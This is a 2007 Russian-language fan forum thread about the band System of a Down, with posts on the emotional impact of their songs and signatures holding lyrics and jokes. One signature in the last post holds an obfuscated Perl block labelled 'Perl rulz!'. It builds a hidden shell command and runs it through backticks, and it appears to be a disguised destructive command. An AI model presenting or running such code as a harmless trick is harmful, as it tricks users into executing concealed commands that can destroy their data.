ALuserX
хаааа хаааа _________________ ...Знай, я все равно тебя сломаю,
Настоящей жизни научу,
Так смешно и просто разгадаю,
Вмиг узнаю - вмиг разоблачу.
ALuserX, ты как всегда в своем репертуаре) _________________ ...Знай, я все равно тебя сломаю,
Настоящей жизни научу,
Так смешно и просто разгадаю,
Вмиг узнаю - вмиг разоблачу.
Добавлено: Ср Сен 26, 2007 4:55 pm Заголовок сообщения:
Абсурд, респект тебе за пост!
Честно говоря, никогда не считала себя фанатом SOAD чисто на интуитивном уровне. имхо, фанаты - существа немного неадекватные и достаточно ограниченные, т.к. искусственно загоняют себя в рамки поклонения одной группе/певцу/певице etc.
Наверное, я ещё и не фанат потому, что изначально вслушивалась в смысл песен СОАД. Если честно, то меня просто поражает каждый раз та чистота эмоций, та искренность, с которой система исполняет свои песни. Иногда, конечно, хочется просто немного расслабиться, послушать любимую музыку, не особо вслушиваясь в смысл, но и даже тогда невозможно не реагировать на такую искреннюю подачу своих мыслей.
Что и говорить, Богом поцелованные.
Добавлено: Чт Ноя 01, 2007 2:32 am Заголовок сообщения:
Для меня СОАД это верняковый способ поднять себе настроение и получить заряд положительных эмоций. Я думаю нет смысла объяснять фанам как это так получается) Зато таким глубоким осмыслением их социального послания похвастаться не могу, по крайней мере пока что)))
Пост действительно клевый. Я даже по почте своим друзьям послал которые тоже СОАД слушают
ни че не читал выше написанное.
Жестко пробивает в тело гвозди доцибельные.
Как-то сидел смотрел клип Spiders и понял что мимика совподает с мимикой Сержа.Могу переживать,злиться,быть просто в бешенстве,может и ком в горле быть,что скажет песня,то со мной и происходит. _________________ Never be bought never be sold
Сержу надо написать песню"я беру все свои деньги и несу их Сержу" _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вт Ноя 27, 2007 1:02 am Заголовок сообщения:
Ох, знаете какие у меня эмоции возникли, когда один чел, когда я ему сказала, что слушаю Систему, ответил, типа, да, все девушки любят популярную музыку, ничё такого. Я ему: ты их слышал? Он: Да, но я-то слушаю потяжелее. Так и хотелось ему заехать, еслиб не расстояние...
Добавлено: Вт Ноя 27, 2007 9:03 am Заголовок сообщения:
Inkaly
в тему об опопсении _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!